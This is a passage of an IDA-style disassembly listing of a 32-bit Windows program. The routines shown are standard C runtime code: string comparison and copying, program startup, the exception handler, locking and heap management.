loc_4048B5: ; CODE XREF: sub_40481B+91�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4068C4
pop ecx
pop ecx
loc_4048C1: ; CODE XREF: sub_40481B+98�j
mov eax, edi
loc_4048C3: ; CODE XREF: sub_40481B+8C�j
pop edi
loc_4048C4: ; CODE XREF: sub_40481B+55�j
pop esi
loc_4048C5: ; CODE XREF: sub_40481B+29�j
pop ebx
leave
retn
sub_40481B endp
; =============== S U B R O U T I N E =======================================
sub_4048C8 proc near ; CODE XREF: sub_40497F+D�p
; sub_406AC5+56�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 0
jnz short loc_40493A
call sub_4064E8
mov [esi+8], eax
mov ecx, [eax+6Ch]
mov [esi], ecx
mov ecx, [eax+68h]
mov [esi+4], ecx
mov ecx, [esi]
cmp ecx, off_410E88
jz short loc_404906
mov ecx, dword_410DA4
test [eax+70h], ecx
jnz short loc_404906
call sub_4088D8
mov [esi], eax
loc_404906: ; CODE XREF: sub_4048C8+2A�j
; sub_4048C8+35�j
mov eax, [esi+4]
cmp eax, dword_410CA8
jz short loc_404927
mov eax, [esi+8]
mov ecx, dword_410DA4
test [eax+70h], ecx
jnz short loc_404927
call sub_408199
mov [esi+4], eax
loc_404927: ; CODE XREF: sub_4048C8+47�j
; sub_4048C8+55�j
mov eax, [esi+8]
test byte ptr [eax+70h], 2
jnz short loc_404944
or dword ptr [eax+70h], 2
mov byte ptr [esi+0Ch], 1
jmp short loc_404944
; ---------------------------------------------------------------------------
loc_40493A: ; CODE XREF: sub_4048C8+D�j
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
loc_404944: ; CODE XREF: sub_4048C8+66�j
; sub_4048C8+70�j
mov eax, esi
pop esi
retn 4
sub_4048C8 endp
; =============== S U B R O U T I N E =======================================
sub_40494A proc near ; CODE XREF: sub_40497F+86�p
; sub_404A52+39�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_404954: ; CODE XREF: sub_40494A+2E�j
movzx eax, byte ptr [esi]
lea ecx, [eax-41h]
inc esi
cmp ecx, 19h
ja short loc_404963
add eax, 20h
loc_404963: ; CODE XREF: sub_40494A+14�j
movzx ecx, byte ptr [edx]
lea edi, [ecx-41h]
inc edx
cmp edi, 19h
ja short loc_404972
add ecx, 20h
loc_404972: ; CODE XREF: sub_40494A+23�j
test eax, eax
jz short loc_40497A
cmp eax, ecx
jz short loc_404954
loc_40497A: ; CODE XREF: sub_40494A+2A�j
pop edi
sub eax, ecx
pop esi
retn
sub_40494A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40497F proc near ; CODE XREF: sub_404A52+45�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_10]
call sub_4048C8
xor ebx, ebx
cmp [ebp+arg_0], ebx
jnz short loc_4049C6
call sub_403F8F
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_4049BC
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4049BC: ; CODE XREF: sub_40497F+34�j
mov eax, 7FFFFFFFh
jmp loc_404A4F
; ---------------------------------------------------------------------------
loc_4049C6: ; CODE XREF: sub_40497F+17�j
push edi
mov edi, [ebp+arg_4]
cmp edi, ebx
jnz short loc_4049F9
call sub_403F8F
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_4049F2
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4049F2: ; CODE XREF: sub_40497F+6A�j
mov eax, 7FFFFFFFh
jmp short loc_404A4E
; ---------------------------------------------------------------------------
loc_4049F9: ; CODE XREF: sub_40497F+4D�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_404A0E
push edi
push [ebp+arg_0]
call sub_40494A
pop ecx
pop ecx
jmp short loc_404A42
; ---------------------------------------------------------------------------
loc_404A0E: ; CODE XREF: sub_40497F+80�j
push esi
loc_404A0F: ; CODE XREF: sub_40497F+BC�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40894E
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40894E
add esp, 10h
inc edi
cmp esi, ebx
jz short loc_404A3D
cmp esi, eax
jz short loc_404A0F
loc_404A3D: ; CODE XREF: sub_40497F+B8�j
sub esi, eax
mov eax, esi
pop esi
loc_404A42: ; CODE XREF: sub_40497F+8D�j
cmp [ebp+var_4], bl
jz short loc_404A4E
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_404A4E: ; CODE XREF: sub_40497F+78�j
; sub_40497F+C6�j
pop edi
loc_404A4F: ; CODE XREF: sub_40497F+42�j
pop ebx
leave
retn
sub_40497F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A52 proc near ; CODE XREF: sub_403040+96�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp dword_411C1C, esi
jnz short loc_404A90
cmp [ebp+arg_0], esi
jnz short loc_404A84
loc_404A65: ; CODE XREF: sub_404A52+35�j
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_404A9F
; ---------------------------------------------------------------------------
loc_404A84: ; CODE XREF: sub_404A52+11�j
cmp [ebp+arg_4], esi
jz short loc_404A65
pop esi
pop ebp
jmp sub_40494A
; ---------------------------------------------------------------------------
loc_404A90: ; CODE XREF: sub_404A52+C�j
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40497F
add esp, 0Ch
loc_404A9F: ; CODE XREF: sub_404A52+30�j
pop esi
pop ebp
retn
sub_404A52 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404AB0 proc near ; CODE XREF: seg001:00403514�p
; sub_4038C0+6D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_404B30
mov dh, [ecx+1]
test dh, dh
jz short loc_404B1D
loc_404AC8: ; CODE XREF: sub_404AB0+58�j
; sub_404AB0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_404AEE
test al, al
jz short loc_404AE8
loc_404ADB: ; CODE XREF: sub_404AB0+36�j
mov al, [esi]
add esi, 1
loc_404AE0: ; CODE XREF: sub_404AB0+45�j
cmp al, dl
jz short loc_404AEE
test al, al
jnz short loc_404ADB
loc_404AE8: ; CODE XREF: sub_404AB0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_404AEE: ; CODE XREF: sub_404AB0+25�j
; sub_404AB0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_404AE0
lea edi, [esi-1]
loc_404AFA: ; CODE XREF: sub_404AB0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_404B29
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_404AC8
mov al, [ecx+3]
test al, al
jz short loc_404B29
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_404AFA
jmp short loc_404AC8
; ---------------------------------------------------------------------------
loc_404B1D: ; CODE XREF: sub_404AB0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_408A86
; ---------------------------------------------------------------------------
loc_404B29: ; CODE XREF: sub_404AB0+4F�j
; sub_404AB0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_404B30: ; CODE XREF: sub_404AB0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_404AB0 endp
; =============== S U B R O U T I N E =======================================
sub_404B36 proc near ; CODE XREF: seg001:00404BDB�p
; seg001:00404C78�p ...
arg_0 = dword ptr 4
cmp dword_41141C, 1
jnz short loc_404B44
call sub_405F02
loc_404B44: ; CODE XREF: sub_404B36+7�j
push [esp+arg_0]
call sub_405D62
push 0FFh
call sub_404279
pop ecx
pop ecx
retn
sub_404B36 endp
; =============== S U B R O U T I N E =======================================
sub_404B5A proc near ; CODE XREF: seg001:00404C60�p
cmp word ptr ds:__ImageBase, 5A4Dh
jnz short loc_404B98
mov eax, ds:dword_400034+8
cmp ds:__ImageBase[eax], 4550h
jnz short loc_404B98
cmp word ptr [eax+400018h], 10Bh
jnz short loc_404B98
cmp dword ptr [eax+400074h], 0Eh
jbe short loc_404B98
xor ecx, ecx
cmp [eax+4000E8h], ecx
setnz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_404B98: ; CODE XREF: sub_404B5A+9�j
; sub_404B5A+1A�j ...
xor eax, eax
retn
sub_404B5A endp
; ---------------------------------------------------------------------------
loc_404B9B: ; CODE XREF: seg001:00404D80�j
push 60h
push offset dword_40E510
call __SEH_prolog4
and dword ptr [ebp-4], 0
lea eax, [ebp-70h]
push eax
call dword_40D114 ; GetStartupInfoA
mov dword ptr [ebp-4], 0FFFFFFFEh
mov edi, 94h
push edi
push 0
mov ebx, dword_40D110
call ebx ; GetProcessHeap
push eax
call dword_40D0F8 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jnz short loc_404BE6
push 12h
call sub_404B36
pop ecx
jmp loc_404D70
; ---------------------------------------------------------------------------
loc_404BE6: ; CODE XREF: seg001:00404BD7�j
mov [esi], edi
push esi
call dword_40D10C ; GetVersionExA
push esi
push 0
test eax, eax
jnz short loc_404C04
call ebx ; GetProcessHeap
push eax
call dword_40D0FC ; RtlFreeHeap
jmp loc_404D70
; ---------------------------------------------------------------------------
loc_404C04: ; CODE XREF: seg001:00404BF4�j
mov eax, [esi+10h]
mov [ebp-20h], eax
mov eax, [esi+4]
mov [ebp-24h], eax
mov eax, [esi+8]
mov [ebp-28h], eax
mov edi, [esi+0Ch]
and edi, 7FFFh
call ebx ; GetProcessHeap
push eax
call dword_40D0FC ; RtlFreeHeap
mov esi, [ebp-20h]
cmp esi, 2
jz short loc_404C36
or edi, 8000h
loc_404C36: ; CODE XREF: seg001:00404C2E�j
mov ecx, [ebp-24h]
mov eax, ecx
shl eax, 8
mov edx, [ebp-28h]
add eax, edx
mov dword_4113D0, esi
mov dword_4113D8, eax
mov dword_4113DC, ecx
mov dword_4113E0, edx
mov dword_4113D4, edi
call sub_404B5A
mov [ebp-20h], eax
xor ebx, ebx
inc ebx
push ebx
call sub_405D08
pop ecx
test eax, eax
jnz short loc_404C7E
push 1Ch
call sub_404B36
pop ecx
loc_404C7E: ; CODE XREF: seg001:00404C74�j
call sub_406621
test eax, eax
jnz short loc_404C8F
push 10h
call sub_404B36
pop ecx
loc_404C8F: ; CODE XREF: seg001:00404C85�j
call sub_40758F
mov [ebp-4], ebx
call sub_409047
test eax, eax
jge short loc_404CA8
push 1Bh
call sub_40422F
pop ecx
loc_404CA8: ; CODE XREF: seg001:00404C9E�j
call dword_40D108 ; GetCommandLineA
mov dword_413BA4, eax
call sub_408F12
mov dword_411414, eax
call sub_408E59
test eax, eax
jge short loc_404CCE
push 8
call sub_40422F
pop ecx
loc_404CCE: ; CODE XREF: seg001:00404CC4�j
call sub_408BE6
test eax, eax
jge short loc_404CDF
push 9
call sub_40422F
pop ecx
loc_404CDF: ; CODE XREF: seg001:00404CD5�j
push ebx
call sub_40434B
pop ecx
test eax, eax
jz short loc_404CF1
push eax
call sub_40422F
pop ecx
loc_404CF1: ; CODE XREF: seg001:00404CE8�j
call sub_408B89
test [ebp-44h], bl
jz short loc_404D01
movzx ecx, word ptr [ebp-40h]
jmp short loc_404D04
; ---------------------------------------------------------------------------
loc_404D01: ; CODE XREF: seg001:00404CF9�j
push 0Ah
pop ecx
loc_404D04: ; CODE XREF: seg001:00404CFF�j
push ecx
push eax
push 0
push offset __ImageBase
call sub_4038C0
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_404D21
push eax
call sub_4044BF
loc_404D21: ; CODE XREF: seg001:00404D19�j
call sub_4044E1
jmp short loc_404D56
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-2Ch], ecx
push eax
push ecx
call sub_407786
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-2Ch]
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_404D51
push eax
call sub_4044D0
loc_404D51: ; CODE XREF: seg001:00404D49�j
call sub_4044F0
loc_404D56: ; CODE XREF: seg001:00404D26�j
mov dword ptr [ebp-4], 0FFFFFFFEh
mov eax, [ebp-1Ch]
jmp short loc_404D75
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFEh
loc_404D70: ; CODE XREF: seg001:00404BE1�j
; seg001:00404BFF�j
mov eax, 0FFh
loc_404D75: ; CODE XREF: seg001:00404D60�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_404D7B: ; DATA XREF: seg002:0041CFD4�o
call sub_409287
jmp loc_404B9B
; =============== S U B R O U T I N E =======================================
sub_404D85 proc near ; CODE XREF: sub_4044FF+15�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_411420, eax
retn
sub_404D85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_404D8F proc near ; CODE XREF: sub_403A78+3D�p
; sub_404E8B+1F�j ...
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, dword_410440
xor eax, ebp
mov [ebp+2A8h+var_4], eax
push esi
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_403FE0
lea eax, [ebp+2A8h+var_328]
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
add esp, 0Ch
mov [ebp+2A8h+var_328], 0C000000Dh
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call dword_40D124 ; IsDebuggerPresent
push 0
mov esi, eax
call dword_40D120 ; SetUnhandledExceptionFilter
lea eax, [ebp+2A8h+var_2D8]
push eax
call dword_40D11C ; UnhandledExceptionFilter
test eax, eax
jnz short loc_404E63
test esi, esi
jnz short loc_404E63
push 2
call sub_40931B
pop ecx
loc_404E63: ; CODE XREF: sub_404D8F+C6�j
; sub_404D8F+CA�j
push 0C000000Dh
call dword_40D118 ; GetCurrentProcess
push eax
call dword_40D0B0 ; TerminateProcess
mov ecx, [ebp+2A8h+var_4]
xor ecx, ebp
pop esi
call sub_403F45
add ebp, 2A8h
leave
retn
sub_404D8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E8B proc near ; CODE XREF: sub_4040E8+1E�p
; sub_4040E8+4D�p ...
push ebp
mov ebp, esp
push dword_411420
call sub_4062CC
test eax, eax
pop ecx
jz short loc_404EA1
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_404EA1: ; CODE XREF: sub_404E8B+11�j
push 2
call sub_40931B
pop ecx
pop ebp
jmp sub_404D8F
sub_404E8B endp
; =============== S U B R O U T I N E =======================================
sub_404EAF proc near ; CODE XREF: sub_403A78+2C�p
; sub_405D62+6C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jz short loc_404EC4
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_404EDF
loc_404EC4: ; CODE XREF: sub_404EAF+B�j
; sub_404EAF+3A�j
call sub_403F8F
push 16h
pop esi
mov [eax], esi
loc_404ECE: ; CODE XREF: sub_404EAF+5D�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_404E8B
add esp, 14h
mov eax, esi
jmp short loc_404F10
; ---------------------------------------------------------------------------
loc_404EDF: ; CODE XREF: sub_404EAF+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_404EEB
mov [ecx], bl
jmp short loc_404EC4
; ---------------------------------------------------------------------------
loc_404EEB: ; CODE XREF: sub_404EAF+36�j
mov edx, ecx
loc_404EED: ; CODE XREF: sub_404EAF+49�j
mov al, [esi]
mov [edx], al
inc edx
inc esi
cmp al, bl
jz short loc_404EFA
dec edi
jnz short loc_404EED
loc_404EFA: ; CODE XREF: sub_404EAF+46�j
cmp edi, ebx
jnz short loc_404F0E
mov [ecx], bl
call sub_403F8F
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_404ECE
; ---------------------------------------------------------------------------
loc_404F0E: ; CODE XREF: sub_404EAF+4D�j
xor eax, eax
loc_404F10: ; CODE XREF: sub_404EAF+2E�j
pop edi
pop esi
pop ebx
retn
sub_404EAF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404F20 proc near ; CODE XREF: sub_403A78+13�p
; sub_405D62+CA�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_404F50
loc_404F2C: ; CODE XREF: sub_404F20+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_404F83
test ecx, 3
jnz short loc_404F2C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_404F50: ; CODE XREF: sub_404F20+A�j
; sub_404F20+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_404F50
mov eax, [ecx-4]
test al, al
jz short loc_404FA1
test ah, ah
jz short loc_404F97
test eax, 0FF0000h
jz short loc_404F8D
test eax, 0FF000000h
jz short loc_404F83
jmp short loc_404F50
; ---------------------------------------------------------------------------
loc_404F83: ; CODE XREF: sub_404F20+13�j
; sub_404F20+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_404F8D: ; CODE XREF: sub_404F20+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_404F97: ; CODE XREF: sub_404F20+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_404FA1: ; CODE XREF: sub_404F20+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_404F20 endp
; =============== S U B R O U T I N E =======================================
sub_404FAB proc near ; CODE XREF: sub_406621+10C�p
push esi
push edi
xor esi, esi
mov edi, offset dword_411428
loc_404FB4: ; CODE XREF: sub_404FAB+35�j
cmp dword_4105E4[esi*8], 1
jnz short loc_404FDC
lea eax, ds:4105E0h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_407B1C
test eax, eax
pop ecx
pop ecx
jz short loc_404FE8
loc_404FDC: ; CODE XREF: sub_404FAB+11�j
inc esi
cmp esi, 24h
jl short loc_404FB4
xor eax, eax
inc eax
loc_404FE5: ; CODE XREF: sub_404FAB+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_404FE8: ; CODE XREF: sub_404FAB+2F�j
and off_4105E0[esi*8], 0
xor eax, eax
jmp short loc_404FE5
sub_404FAB endp
; =============== S U B R O U T I N E =======================================
sub_404FF4 proc near ; CODE XREF: sub_406375:loc_4063AD�j
push ebx
mov ebx, dword_40D128
push esi
mov esi, offset off_4105E0
push edi
loc_405002: ; CODE XREF: sub_404FF4+30�j
mov edi, [esi]
test edi, edi
jz short loc_40501B
cmp dword ptr [esi+4], 1
jz short loc_40501B
push edi
call ebx ; RtlDeleteCriticalSection
push edi
call sub_40405A
and dword ptr [esi], 0
pop ecx
loc_40501B: ; CODE XREF: sub_404FF4+12�j
; sub_404FF4+18�j
add esi, 8
cmp esi, offset dword_410700
jl short loc_405002
mov esi, offset off_4105E0
pop edi
loc_40502C: ; CODE XREF: sub_404FF4+50�j
mov eax, [esi]
test eax, eax
jz short loc_40503B
cmp dword ptr [esi+4], 1
jnz short loc_40503B
push eax
call ebx ; RtlDeleteCriticalSection
loc_40503B: ; CODE XREF: sub_404FF4+3C�j
; sub_404FF4+42�j
add esi, 8
cmp esi, offset dword_410700
jl short loc_40502C
pop esi
pop ebx
retn
sub_404FF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405049 proc near ; CODE XREF: sub_403B0E+2�p
; sub_4040B0+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push off_4105E0[eax*8]
call dword_40D12C ; RtlLeaveCriticalSection
pop ebp
retn
sub_405049 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40505E proc near ; CODE XREF: sub_405121+14�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40E538
call __SEH_prolog4
xor edi, edi
inc edi
mov [ebp+var_1C], edi
xor ebx, ebx
cmp dword_41157C, ebx
jnz short loc_405092
call sub_405F02
push 1Eh
call sub_405D62
push 0FFh
call sub_404279
pop ecx
pop ecx
loc_405092: ; CODE XREF: sub_40505E+1A�j
mov esi, [ebp+arg_0]
lea esi, ds:4105E0h[esi*8]
cmp [esi], ebx
jz short loc_4050A4
mov eax, edi
jmp short loc_405112
; ---------------------------------------------------------------------------
loc_4050A4: ; CODE XREF: sub_40505E+40�j
push 18h
call sub_409323
pop ecx
mov edi, eax
cmp edi, ebx
jnz short loc_4050C1
call sub_403F8F
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_405112
; ---------------------------------------------------------------------------
loc_4050C1: ; CODE XREF: sub_40505E+52�j
push 0Ah
call sub_405121
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi], ebx
jnz short loc_4050FC
push 0FA0h
push edi
call sub_407B1C
pop ecx
pop ecx
test eax, eax
jnz short loc_4050F8
push edi
call sub_40405A
pop ecx
call sub_403F8F
mov dword ptr [eax], 0Ch
mov [ebp+var_1C], ebx
jmp short loc_405103
; ---------------------------------------------------------------------------
loc_4050F8: ; CODE XREF: sub_40505E+81�j
mov [esi], edi
jmp short loc_405103
; ---------------------------------------------------------------------------
loc_4050FC: ; CODE XREF: sub_40505E+70�j
push edi
call sub_40405A
pop ecx
loc_405103: ; CODE XREF: sub_40505E+98�j
; sub_40505E+9C�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405118
mov eax, [ebp+var_1C]
loc_405112: ; CODE XREF: sub_40505E+44�j
; sub_40505E+61�j
call __SEH_epilog4
retn
sub_40505E endp
; =============== S U B R O U T I N E =======================================
sub_405118 proc near ; CODE XREF: sub_40505E+AC�p
; DATA XREF: seg001:0040E550�o
push 0Ah
call sub_405049
pop ecx
retn
sub_405118 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405121 proc near ; CODE XREF: sub_403AC8+1D�p
; sub_40405A+1E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:4105E0h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_405147
push eax
call sub_40505E
test eax, eax
pop ecx
jnz short loc_405147
push 11h
call sub_40422F
pop ecx
loc_405147: ; CODE XREF: sub_405121+11�j
; sub_405121+1C�j
push dword ptr [esi]
call dword_40D130 ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_405121 endp
; =============== S U B R O U T I N E =======================================
sub_405152 proc near ; CODE XREF: sub_405D08+37�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_41157C
call dword_40D0F8 ; RtlAllocateHeap
test eax, eax
mov dword_413B90, eax
jnz short loc_40516F
retn
; ---------------------------------------------------------------------------
loc_40516F: ; CODE XREF: sub_405152+1A�j
mov ecx, [esp+arg_0]
and dword_411578, 0
and dword_413B8C, 0
mov dword_413B98, eax
xor eax, eax
mov dword_413B94, ecx
mov dword_413B9C, 10h
inc eax
retn
sub_405152 endp
; =============== S U B R O U T I N E =======================================
sub_40519A proc near ; CODE XREF: sub_40405A+29�p
; sub_40A965+4E�p ...
arg_0 = dword ptr 4
mov ecx, dword_413B8C
mov eax, dword_413B90
imul ecx, 14h
add ecx, eax
jmp short loc_4051BE
; ---------------------------------------------------------------------------
loc_4051AC: ; CODE XREF: sub_40519A+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_4051C4
add eax, 14h
loc_4051BE: ; CODE XREF: sub_40519A+10�j
cmp eax, ecx
jb short loc_4051AC
xor eax, eax
locret_4051C4: ; CODE XREF: sub_40519A+1F�j
retn
sub_40519A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4051C5 proc near ; CODE XREF: sub_40405A+38�p
; sub_40B7A2+B5�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_4054D5
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_405290
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405228
push 3Fh
pop edx
loc_405228: ; CODE XREF: sub_4051C5+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_405272
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_405253
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_40526F
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_40526F
; ---------------------------------------------------------------------------
loc_405253: ; CODE XREF: sub_4051C5+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_40526F
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_40526F: ; CODE XREF: sub_4051C5+85�j
; sub_4051C5+8C�j ...
mov ebx, [ebp+arg_4]
loc_405272: ; CODE XREF: sub_4051C5+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_405290: ; CODE XREF: sub_4051C5+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_40529E
push 3Fh
pop edx
loc_40529E: ; CODE XREF: sub_4051C5+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_40533C
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
